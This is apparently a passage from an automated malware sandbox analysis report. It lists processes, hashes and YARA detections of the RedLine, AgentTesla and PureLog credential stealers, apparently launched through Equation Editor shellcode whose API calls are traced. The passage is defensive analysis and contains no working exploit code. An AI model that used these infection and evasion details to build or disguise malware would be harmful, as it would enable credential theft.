                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0x860000
                                                                    File size:45'248 bytes
                                                                    MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:04:59:10
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0xba0000
                                                                    File size:1'287'680 bytes
                                                                    MD5 hash:158C5C0367C262694F3C44AE85B891B6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:04:59:11
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0xf90000
                                                                    File size:45'248 bytes
                                                                    MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:04:59:11
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0xba0000
                                                                    File size:1'287'680 bytes
                                                                    MD5 hash:158C5C0367C262694F3C44AE85B891B6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:04:59:12
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0x1180000
                                                                    File size:45'248 bytes
                                                                    MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:04:59:12
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0xba0000
                                                                    File size:1'287'680 bytes
                                                                    MD5 hash:158C5C0367C262694F3C44AE85B891B6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:04:59:13
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0x1350000
                                                                    File size:45'248 bytes
                                                                    MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:15
                                                                    Start time:04:59:45
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                    Imagebase:0x13fca0000
                                                                    File size:3'151'128 bytes
                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:16
                                                                    Start time:04:59:46
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1432 --field-trial-handle=1256,i,7674118080207217716,3458138178017285583,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                    Imagebase:0x13fa80000
                                                                    File size:3'151'128 bytes
                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:18
                                                                    Start time:04:59:51
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                    Imagebase:0x13fca0000
                                                                    File size:3'151'128 bytes
                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:04:59:51
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1200,i,5669568352595894290,4267387126016238941,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                    Imagebase:0x13fca0000
                                                                    File size:3'151'128 bytes
                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true


                                                                      Execution Graph

                                                                      Execution Coverage:28.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:78.1%
                                                                      Total number of Nodes:602
                                                                      Total number of Limit Nodes:3

                                                                      Callgraph


                                                                      Control-flow Graph

                                                                      APIs
                                                                      • WriteFile.KERNELBASE(035206EE,03520705,00000000,00000000,00000000,?,03520705,035206EE,00000000,00000000,00000000,00000000,035206A7,00000050,00000000), ref: 035207FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 18553326b85a00a69889a48aee1867741f33fb832c981e95635d7b85ca4053e9
                                                                      • Instruction ID: c0342ab3e8512f3a85aa04771464e6a219a2701b9d9726d0ff6913b538de56c1
                                                                      • Opcode Fuzzy Hash: 18553326b85a00a69889a48aee1867741f33fb832c981e95635d7b85ca4053e9
                                                                      • Instruction Fuzzy Hash: 9221C5714093156ADA10EA60AC81F7FBEB9FBC2B00F148A19F5915B0F1D6B0D50886E2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • ExitProcess.KERNELBASE(03520570), ref: 03520582
                                                                        • Part of subcall function 0352059B: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03520647
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateExitFileProcess
                                                                      • String ID:
                                                                      • API String ID: 2838702978-0
                                                                      • Opcode ID: 680202d3448b635bfa15b890d00029387e6ae4dfaac09712cf61206fa0a5f26a
                                                                      • Instruction ID: 5530c0a422406befdd26f2c4d6cafa1cf0bbe0d3fcd06c03dbf6bf2ddbc7e4eb
                                                                      • Opcode Fuzzy Hash: 680202d3448b635bfa15b890d00029387e6ae4dfaac09712cf61206fa0a5f26a
                                                                      • Instruction Fuzzy Hash: 2121EF6580F7D45FE322D7202E5E794BF60BB93A00F1D49CA91C54F1F3D295A10A93D6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • WinExec.KERNEL32(?,00000001,?,0352085F,?,03520822,?,?,03520809,00000000,00000000,00000000,00000000,035206A7,00000050,00000000), ref: 03520874
                                                                        • Part of subcall function 03520887: ExitProcess.KERNELBASE(00000000,?,0352087B,?,0352085F,?,03520822,?,?,03520809,00000000,00000000,00000000,00000000,035206A7,00000050), ref: 0352088C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: ExecExitProcess
                                                                      • String ID:
                                                                      • API String ID: 4112423671-0
                                                                      • Opcode ID: 09d7e942a8b6d033ba72d1ddd3f717c78c986e7522e5b90d67ec5e1a4840f4c2
                                                                      • Instruction ID: 74f896aedd4e7668d09d838e54e4940179a0accaa0fe4bec4aa95cfe9982b4b2
                                                                      • Opcode Fuzzy Hash: 09d7e942a8b6d033ba72d1ddd3f717c78c986e7522e5b90d67ec5e1a4840f4c2
                                                                      • Instruction Fuzzy Hash: 10F0D19994637251CB34E238A8487FBAE61BB93310FCC8853EC82070F6916880C397D9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 416f93c117a728af7f2b2bdd79a199b96d3fb460dd29e5ce8bbb6cdc2b3b8add
                                                                      • Instruction ID: cf51d5bc93ed768e33fdb11e6ac7740426a0a6dc412aedc6c8d42d1faeeba253
                                                                      • Opcode Fuzzy Hash: 416f93c117a728af7f2b2bdd79a199b96d3fb460dd29e5ce8bbb6cdc2b3b8add
                                                                      • Instruction Fuzzy Hash: 4241DA2044E7E12ED722E7305D9AB59BF747F83A00F2985CEE1814F1F3E6A56209C756
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 66b12095d77fd94ea65a69a68c420aa6cec82a98ef1edfc52787f6ea6af5b01e
                                                                      • Instruction ID: 1a064e8ac65e73a53707d39e66f7965cad1eb20bc9b719bef2b08c3af14a8674
                                                                      • Opcode Fuzzy Hash: 66b12095d77fd94ea65a69a68c420aa6cec82a98ef1edfc52787f6ea6af5b01e
                                                                      • Instruction Fuzzy Hash: 7131D63040E7D26FC711EB609D41B6ABF79BFC3640F1C898DF1814B0F2E66596098B55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(03520651), ref: 03520661
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8efb823637949394a820d562d74b85bc2a80829c3a1ef3dc7f2820635516555f
                                                                      • Instruction ID: 086d253a31aa04aadfec696866f1225d372a918fd8033ece4a8adebf6683f76d
                                                                      • Opcode Fuzzy Hash: 8efb823637949394a820d562d74b85bc2a80829c3a1ef3dc7f2820635516555f
                                                                      • Instruction Fuzzy Hash: C631002044E7D12EC712E7345D9AB5ABF74BF83600F1880CEE1824F5F3E65A6205D716
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: b1b615c9d91ddc0e5ea21e5ff36653efc2f68e1bf6564cc91f7788a87a4d63e5
                                                                      • Instruction ID: 0a3a33abdaae24cf95cf7635b2a5da44e5a6bc95988375dbfc340cc6122e3dbc
                                                                      • Opcode Fuzzy Hash: b1b615c9d91ddc0e5ea21e5ff36653efc2f68e1bf6564cc91f7788a87a4d63e5
                                                                      • Instruction Fuzzy Hash: 7121E9714093556FD710EA609D81B6BFFB9FBC3B40F18894DF5914B0F2E2B1D5098AA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • WriteFile.KERNELBASE(035206EE,03520705,00000000,00000000,00000000,?,03520705,035206EE,00000000,00000000,00000000,00000000,035206A7,00000050,00000000), ref: 035207FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: e52008649e949c67fc193a14be535757e52065788752b6a9b4a718ad1f39f738
                                                                      • Instruction ID: b813092f320749e198228568f33b433124ac59ed798c8b3ba48a2bd79f2ebf31
                                                                      • Opcode Fuzzy Hash: e52008649e949c67fc193a14be535757e52065788752b6a9b4a718ad1f39f738
                                                                      • Instruction Fuzzy Hash: 3821C5304097967FCB11EB649D81B6FBFB9FFC3B40F18894CB1815A0F2E67586088A65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 2c3b1a2a4d8c223b42b358fe31970d745bcf46a9219579a97104c1c12bc46b9b
                                                                      • Instruction ID: f30fff5c8884921b777bf9e9a04237f86c4e64de3f3054d75c06e318e15f3baf
                                                                      • Opcode Fuzzy Hash: 2c3b1a2a4d8c223b42b358fe31970d745bcf46a9219579a97104c1c12bc46b9b
                                                                      • Instruction Fuzzy Hash: B2210DA580F3E15FE322D3202D9EB55BE24BBD3600F1D858A90C14F1F3D299B10A93A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

Memory Dump Source
• Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: e4d30f52fa01deb95ec5d8623ed11d396d63132c4e4b819a89fb2f372498a43f
• Instruction ID: c4da6e27dc3e1c8ae0ab288672171094a05fdc6f10452d002f8cbd2c874740b8
• Opcode Fuzzy Hash: e4d30f52fa01deb95ec5d8623ed11d396d63132c4e4b819a89fb2f372498a43f
• Instruction Fuzzy Hash: 6D112EA580E3E11FE321D3202D9EB95FE24BB93600F0D868A91C54F1F3D291A10A9296
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: abdf6eb72968487407a0b646d669ddb846f8ee2c648fe95060ec85859213e528
• Instruction ID: 5b2ab0ebb0df2c716c089411244e666a5af36f1583682657cae9a0b0af06d9a9
• Opcode Fuzzy Hash: abdf6eb72968487407a0b646d669ddb846f8ee2c648fe95060ec85859213e528
• Instruction Fuzzy Hash: 1411A2714093566FDB10EA50DC81FAFBAB9FFC2B40F14895DB1905B0E1E6B1D5088AA2
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
• WriteFile.KERNELBASE(035206EE,03520705,00000000,00000000,00000000,?,03520705,035206EE,00000000,00000000,00000000,00000000,035206A7,00000050,00000000), ref: 035207FD
Memory Dump Source
• Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: efe35d33fb53c262e8aff48a2b14a8252caba624d41dc55ac144238288ad08bd
• Instruction ID: dfb47b57efd501a4434b198404b4208f3c397854d50d9bdf6401947b9b85e430
• Opcode Fuzzy Hash: efe35d33fb53c262e8aff48a2b14a8252caba624d41dc55ac144238288ad08bd
• Instruction Fuzzy Hash: 27114C304097566AD711EA14DC41F6BBFA9FBC2B40F08891CB591560F1E67195098BA6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 02f976522695f3370a17684948930a1800c7a1aaafdf2fdfc1499f6d152197b6
• Instruction ID: 2c1b56e3d4e58ebd85cec689f952cc6f9a5d5eeda3f8f75b826e5a2f865d97ac
• Opcode Fuzzy Hash: 02f976522695f3370a17684948930a1800c7a1aaafdf2fdfc1499f6d152197b6
• Instruction Fuzzy Hash: 0601B5A540E3D41FD321D3302C5EB91BE647F93604F1D868EA1C48F1E3D2A5A1098396
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
• Instruction ID: 43a75ce9f7375c83d204b0b6b3b93a5cc2375572f2d5b388412e4fe23e671bd9
• Opcode Fuzzy Hash: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
• Instruction Fuzzy Hash: 75F0F671008756AFD712DE14DC41F6BBAAAFBC6B80F088D1DB1905A0F5D77599088B62
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
• CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03520647
  • Part of subcall function 03520661: LoadLibraryW.KERNEL32(03520651), ref: 03520661
Memory Dump Source
• Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
Similarity
• API ID: CreateFileLibraryLoad
• String ID:
• API String ID: 2049390123-0
• Opcode ID: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
• Instruction ID: ebfa2131a1514e214835c26d5f05bbacc885a552660082fbf29072a598247d3d
• Opcode Fuzzy Hash: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
• Instruction Fuzzy Hash: 6DE0127454A3912AD231D7301D9EF95AD647FC3B04F0DC989B2C4AF1F2C6A5B0048295
Uniqueness

Uniqueness Score: -1.00%

APIs
• ExitProcess.KERNELBASE(00000000,?,0352087B,?,0352085F,?,03520822,?,?,03520809,00000000,00000000,00000000,00000000,035206A7,00000050), ref: 0352088C
Memory Dump Source
• Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
• Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
• Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
• Instruction Fuzzy Hash:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
• Instruction ID: f39d3d18fed36d29f73ed9753fd82592eeb97725d1444f0c6cfe6e821574194d
• Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
• Instruction Fuzzy Hash: 14D05E31202502CFD304EB04D980E13F37AFFD4210B14C264D5004B7A9C330E892CAD4
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 3.2%
Dynamic/Decrypted Code Coverage: 0.4%
Signature Coverage: 3.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 80
